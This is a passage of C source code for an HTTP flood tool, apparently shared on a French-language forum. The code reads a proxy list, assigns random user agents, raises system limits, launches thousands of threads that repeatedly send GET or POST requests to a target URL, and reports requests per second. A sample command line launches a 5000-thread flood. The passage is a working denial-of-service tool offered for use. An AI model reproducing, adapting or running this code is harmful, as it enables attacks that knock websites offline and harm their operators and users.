                        new_node->data->ip = malloc(strlen(pch)+1); strcpy(new_node->data->ip, pch);
                        pch = (char *)strtok(NULL, ":");
                        if(pch == NULL) break;
                        new_node->data->port = atoi(pch);
                        pch = (char *)strtok(NULL, ":");
                        new_node->data->type = malloc(strlen(pch)+1); strcpy(new_node->data->type, pch);
                        pch = (char *)strtok(NULL, ":");
                        new_node->useragent = useragents[rand() % (sizeof(useragents)/sizeof(char *))];
                        new_node->prev = head;
                        new_node->next = head->next;
                        head->next = new_node;
                }
        }
        free(buffer);
        const rlim_t kOpenFD = 1024 + (num_threads * 2);
        struct rlimit rl;
        int result;
        rl.rlim_cur = kOpenFD;
        rl.rlim_max = kOpenFD;
        result = setrlimit(RLIMIT_NOFILE, &rl);
        if (result != 0)
        {
                perror("setrlimit");
                fprintf(stderr, "setrlimit returned result = %d\n", result);
        }
        bzero(&rl, sizeof(struct rlimit));
        rl.rlim_cur = 256 * 1024;
        rl.rlim_max = 4096 * 1024;
        result = setrlimit(RLIMIT_STACK, &rl);
        if (result != 0)
        {
                perror("setrlimit_stack");
                fprintf(stderr, "setrlimit_stack returned result = %d\n", result);
        }
        setupparts();
        parseURL(argv[1], returnparts);
        if(argc > 6 && !(strcmp(argv[6], "0") == 0))
        {
                ipstr = malloc(strlen(argv[6])+1);
                bzero(ipstr, strlen(argv[6])+1);
                strcpy(ipstr, argv[6]);
                fprintf(stdout, "Using manual IP...\n");
        } else {
                struct hostent *he;
                struct in_addr a;
                he = gethostbyname(returnparts[host]->value);
                if (he)
                {
                        while (*he->h_addr_list)
                        {
                                bcopy(*he->h_addr_list++, (char *) &a, sizeof(a));
                                ipstr = malloc(INET_ADDRSTRLEN+1);
                                inet_ntop (AF_INET, &a, ipstr, INET_ADDRSTRLEN);
                                break;
                        }
                }
                else
                { herror("gethostbyname"); }
        }
        char *postdata = malloc(1);
        bzero(postdata, 1);
        char *extrahead = malloc(1);
        bzero(extrahead, 1);
        if(argc > 7)
        {
                fprintf(stdout, "Using post parameters\n");
                free(postdata);
                free(extrahead);
                postdata = argv[7];
                extrahead = malloc(4096);
                bzero(extrahead, 4096);
                sprintf(extrahead, "Content-Length: %d\r\nContent-Type: application/x-www-form-urlencoded\r\n", strlen(postdata));
        }
        threads = malloc((num_threads + 1) * sizeof(pthread_t *));
        bzero(threads, (num_threads + 1) * sizeof(pthread_t *));
        postpayload = malloc(4096);
        urll = argv[1];
        sprintf(postpayload, postformat, method, returnparts[path]->value, returnparts[host]->value, extrahead, postdata);
        freeparts();
        fprintf(stdout, "Starting Flood...\n");
        for(i = 0;i<num_threads;i++){
                *(threads + i) = malloc(sizeof(pthread_t));
                bzero(*(threads + i), sizeof(pthread_t));
                pthread_create(*(threads + i), NULL, &flood, (void *)head);
                head = head->next;
        }
        int temp = atoi(argv[5]);
        for(i = 0;i<temp;i++)
        {
                sleep(1);
                printf("R/s: %d\n", rps);
                rps = 0;
        }
        exit(0);
}
char *geturl(char *url, char *useragent, char *ip)
{
RETRY:
        setupparts();
        parseURL(url, returnparts);
        struct sockaddr_in serverAddr;
        bzero(&serverAddr, sizeof(serverAddr));
        serverAddr.sin_family = AF_INET;
        serverAddr.sin_port = htons(ATTACKPORT);
        serverAddr.sin_addr.s_addr = inet_addr(ip);
        int serverSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        unsigned int yes = 1;
        setsockopt(serverSocket,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(yes));
        if(connect(serverSocket, (struct sockaddr *)&serverAddr, sizeof(serverAddr)) > 0)
        {
                printf("GETURL CONNECT FAILED, RETRYING\n");
                close(serverSocket);
                freeparts();
                goto RETRY;
        }
        int bytes = 0;
        char *payload = malloc(8094);
        bzero(payload, 8094);
        sprintf(payload, "GET /%s HTTP/1.0\r\nHost: %s\r\nConnection: close\r\nUser-Agent: %s\r\n\r\n", returnparts[path]->value, returnparts[host]->value, useragent);
        freeparts();
        bytes = send(serverSocket, payload, strlen(payload), MSG_NOSIGNAL);
        if(bytes == -1)
        {
                printf("GETURL SEND FAILED, SITE CLOSED CONNECTION, RETRYING\n");
                close(serverSocket);
                goto RETRY;
        }
        int total = 0;
        int currentsize = 4096;
        char *buffer = malloc(4096);
        bzero(buffer, 4096);
        bytes = recv(serverSocket, buffer, 4096, 0);
        while(bytes > 0)
        {
                total += bytes;
                if(total+4096 > currentsize)
                {
                        char *new_buffer = malloc(total+4096);
                        bzero(new_buffer, total+4096);
                        memcpy(new_buffer, buffer, total);
                        free(buffer);
                        buffer = new_buffer;
                        currentsize = total+4096;
                }
                bytes = recv(serverSocket, buffer+total, 4096, 0);
        }
        return buffer;
}
char *stristr(const char *String, const char *Pattern)
{
        char *pptr, *sptr, *start;
        uint slen, plen;
        for (start = (char *)String,
        pptr = (char *)Pattern,
        slen = strlen(String),
        plen = strlen(Pattern);
        slen >= plen;
        start++, slen--)
        {
              
                while (toupper(*start) != toupper(*Pattern))
                {
                        start++;
                        slen--;
                      
                        if (slen < plen)
                        return(NULL);
                }
                sptr = start;
                pptr = (char *)Pattern;
                while (toupper(*sptr) == toupper(*pptr))
                {
                        sptr++;
                        pptr++;
                      
                        if ('\0' == *pptr)
                        return (start);
                }
        }
        return(NULL);
}
void freeparts()
{
        return;
        if(returnparts[0]!=NULL) { free(returnparts[0]); }
        if(returnparts[1]!=NULL) { free(returnparts[1]); }
        if(returnparts[2]!=NULL) { free(returnparts[2]); }
        if(returnparts[3]!=NULL) { free(returnparts[3]); }
        if(returnparts[4]!=NULL) { free(returnparts[4]); }
        if(returnparts[5]!=NULL) { free(returnparts[5]); }
        if(returnparts[6]!=NULL) { free(returnparts[6]); }
        if(returnparts[7]!=NULL) { free(returnparts[7]); }
        /*if(returnparts[8]!=NULL) { free(returnparts[8]); }*/
        return;
}
void setupparts()
{
        returnparts[0] = malloc(sizeof(struct urlparts));
        returnparts[1] = malloc(sizeof(struct urlparts));
        returnparts[2] = malloc(sizeof(struct urlparts));
        returnparts[3] = malloc(sizeof(struct urlparts));
        returnparts[4] = malloc(sizeof(struct urlparts));
        returnparts[5] = malloc(sizeof(struct urlparts));
        returnparts[6] = malloc(sizeof(struct urlparts));
        returnparts[7] = malloc(sizeof(struct urlparts));
        /*returnparts[8] = malloc(sizeof(struct urlparts));*/
        bzero(returnparts[0], sizeof(struct urlparts));
        bzero(returnparts[1], sizeof(struct urlparts));
        bzero(returnparts[2], sizeof(struct urlparts));
        bzero(returnparts[3], sizeof(struct urlparts));
        bzero(returnparts[4], sizeof(struct urlparts));
        bzero(returnparts[5], sizeof(struct urlparts));
        bzero(returnparts[6], sizeof(struct urlparts));
        bzero(returnparts[7], sizeof(struct urlparts));
        /*bzero(returnparts[8], sizeof(struct urlparts));*/
        returnparts[0]->name = "scheme";
        strcpy(returnparts[0]->separator, ":");
        returnparts[1]->name = "userid";
        strcpy(returnparts[1]->separator, "@");
        returnparts[2]->name = "password";
        strcpy(returnparts[2]->separator, ":");
        returnparts[3]->name = "host";
        strcpy(returnparts[3]->separator, "//");
        returnparts[4]->name = "port";
        strcpy(returnparts[4]->separator, ":");
        returnparts[5]->name = "path";
        strcpy(returnparts[5]->separator, "/");
        returnparts[6]->name = "param";
        strcpy(returnparts[6]->separator, ";");
        /*returnparts[7]->name = "query";
        strcpy(returnparts[7]->separator, "?");*/
        returnparts[7]->name = "fragment";
        strcpy(returnparts[7]->separator, "#");
        return;
}
int parseURL(char *url, struct urlparts **returnpart) {
        register i;
        int seplen;
        char * remainder;
        //char * regall = ":/;?#";
        char * regall = ":/;#";
        //char * regpath = ":;?#";
        char * regpath = ":;#";
        char * regx;
        if(!*url)
        {
                strcpy(parseError, "nothing to do!\n");
                return 0;
        }
        if((remainder = malloc(strlen(url) + 1)) == NULL)
        {
                printf("cannot allocate memory\n");
                exit(-1);
        }
        strcpy(remainder, url);
        if(firstpunc(remainder) == ':')
        {
                strcpy(returnpart[scheme]->value, strsplit(remainder, returnpart[scheme]->separator));
                strleft(remainder, 1);
        }
        if (!strcmp(returnpart[scheme]->value, "mailto"))
        *(returnpart[host]->separator) = 0;
        for(i = 0; i < NUMPARTS; i++)
        {
                if(!*remainder)
                break;
                if(i == scheme || i == userid || i == password)
                continue;
                if(i == host && strchr(remainder, '@'))
                {
                        if(!strncmp(remainder, "//", 2))
                        strleft(remainder, 2);
                        strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
                        strleft(remainder, 1);
                        if(strchr(remainder, '@'))
                        {
                                strcpy(returnpart[password]->value, strsplit(remainder, "@"));
                                strleft(remainder, 1);
                        }
                        *(returnpart[host]->separator) = 0;
                }
                if(i == path && (! *(returnpart[scheme]->value)))
                {
                        *(returnpart[path]->separator) = 0;
                        strcpy(returnpart[scheme]->value, "http");
                }
                regx = (i == path) ? regpath : regall ;
                seplen = strlen(returnpart[i]->separator);
                if(strncmp(remainder, returnpart[i]->separator, seplen))
                continue;
                else
                strleft(remainder, seplen);
                strcpy(returnpart[i]->value, strsplit(remainder, regx));
        }
        if(*remainder)
        sprintf(parseError, "I don't understand '%s'", remainder);
        free(remainder);
        return 0;
}
char *str_replace(char *orig, char *rep, char *with) {
        char *result;
        char *ins;   
        char *tmp;   
        int len_rep; 
        int len_with;
        int len_front;
        int count;   
        if (!orig)
        return NULL;
        if (!rep || !(len_rep = strlen(rep)))
        return NULL;
        if (!(ins = strstr(orig, rep)))
        return NULL;
        if (!with)
        with = "";
        len_with = strlen(with);
        for (count = 0; tmp = strstr(ins, rep); ++count) {
                ins = tmp + len_rep;
        }
        tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
        if (!result)
        return NULL;
        while (count--) {
                ins = strstr(orig, rep);
                len_front = ins - orig;
                tmp = strncpy(tmp, orig, len_front) + len_front;
                tmp = strcpy(tmp, with) + len_with;
                orig += len_front + len_rep;
        }
        strcpy(tmp, orig);
        return result;
}
char * strsplit(char * s, char * tok) {
#define OUTLEN (255)
        register i, j;
        static char out[OUTLEN + 1];
        for(i = 0; s[i] && i < OUTLEN; i++)
        {
                if(strchr(tok, s[i]))
                break;
                else
                out[i] = s[i];
        }
        out[i] = 0;
        if(i && s[i])
        {
                for(j = 0; s[i]; i++, j++) s[j] = s[i];
                s[j] = 0;
        }
        else if (!s[i])
        *s = 0;
        return out;
}
char firstpunc(char * s) {
        while(*s++)
        if(!isalnum(*s)) return *s;
        return 0;
}
int strleft(char * s, int n) {
        int l;
        l = strlen(s);
        if(l < n)
        return -1;
        else if (l == n)
        *s = 0;
        memmove(s, s + n, l - n + 1);
        return n;
}
//BEGIN COMPLICATED MATH STUFF
int evalmath(char *input)
{
        char *output = malloc((strlen(input)*2)+1);
        memset(output, 0, (strlen(input)*2)+1);
        struct stack
        {
                int data[40];
                int top;
        } X;
        char *i = input;
        char *p = output;
        char n1;
        X.top = -1;
        int debugstack = 0;
      
        int prio(char op)
        {
                int pri = 0;
                if(op == '*' || op == '/' || op =='%')
                        pri = 2;
                else
                {
                        if(op == '+' || op == '-')
                                pri = 1;
                }
                return pri;
        }
      
        void push(int num)
        {
                if(X.top != 39)
                {
                        if(debugstack) printf("push'd %d\n", num);
                        ++X.top;
                        X.data[X.top]=num;
                }
        }
 
        int pop()
        {
                int popd=(int)-1;
                if(X.top != -1)
                {
                        popd= X.data[X.top];
                        --X.top;
                }
                if(debugstack) printf("pop'd %d\n", popd);
                return popd;
        }
      
        while(*i)
        {
                while(*i == ' ' || *i == '\t')
                {
                        i++;
                }
                if( isdigit(*i) || isalpha(*i) )
                {
                        while( isdigit(*i) || isalpha(*i))
                        {
                                *p = *i;
                                p++;
                                i++;
                        }
                        *p = ' ';
                        p++;
                }
                if( *i == '(' )
                {
                        push(*i);
                        i++;
                }
                if( *i == ')')
                {
                        n1 = pop();
                        while( n1 != '(' )
                        {
                                *p = n1;
                                p++;
                                *p = ' ';
                                p++;
                                n1 = pop();
                        }
                        i++;
                }
                if(*i == '+' || *i == '-' || *i == '*' || *i == '/' || *i == '%')
                {
                        if(X.top == -1)
                        {
                                push(*i);
                        }
                        else
                        {
                                n1 = pop();
                                while(prio(n1) >= prio(*i))
                                {
                                        *p = n1;
                                        p++;
                                        *p = ' ';
                                        p++;
                                        n1 = pop();
                                }
                                push(n1);
                                push(*i);
                        }
                        i++;
                }
        }
        while(X.top != -1)
        {
                n1 = pop();
                *p = n1;
                p++;
                *p = ' ';
                p++;
        }
        *p = '\0';
      
        memset(&X, 0, sizeof(X));
      
        X.top = -1;
      
        //debugstack = 1;
      
        char *outorig = output;
      
        while(*output)
        {
                while(*output == ' ') output++;
                if(*output == '\0') return pop();
                if(!isdigit(*output))
                {
                        int op2;
                        int match = 0;
                        if(debugstack) printf("op %c\n", *output);
                        switch(*output) {
                        case '+':
                                push(pop() + pop());
                                match = 1;
                                break;
                        case '*':
                                push(pop() * pop());
                                match = 1;
                                break;
                        case '-':
                                push(pop() - pop());
                                match = 1;
                                break;
                        case '/':
                                op2 = pop();
                                push(pop() / op2);
                                match = 1;
                                break;
                        }
                        if(match) output++; continue;
                }
                int n = *output - '0';
                output++;
                while(isdigit(*output))
                {
                        n = 10 * n + *output - '0';
                        output++;
                }
                push(n);
                if(*output == '\0') return pop();
                output++;
        }
      
        free(outorig);
      
        return pop();
}
//END COMPLICATED MATH STUFF
Code:
./ghp 127.0.0.1 GET 5000 proxies.txt 3600 0 %random%

Source :
http://i.imgur.com/EAMayWm.png


Source :
lien ou image supprimée
 
  • J'aime
Les réactions: BeX
Haut Bas